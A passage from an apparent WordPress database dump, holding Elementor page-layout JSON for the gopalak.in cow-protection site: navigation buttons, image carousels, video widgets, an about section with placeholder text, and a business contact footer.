here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10293,1719,'_elementor_page_assets','a:0:{}'),(10295,1720,'_elementor_edit_mode','builder'),(10296,1720,'_elementor_template_type','wp-page'),(10297,1720,'_elementor_version','3.7.8'),(10298,1720,'_wp_page_template','elementor_canvas'),(10299,1720,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10300,1720,'_elementor_page_assets','a:0:{}'),(10302,1721,'_elementor_edit_mode','builder'),(10303,1721,'_elementor_template_type','wp-page'),(10304,1721,'_elementor_version','3.7.8'),(10305,1721,'_wp_page_template','elementor_canvas'),(10306,1721,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\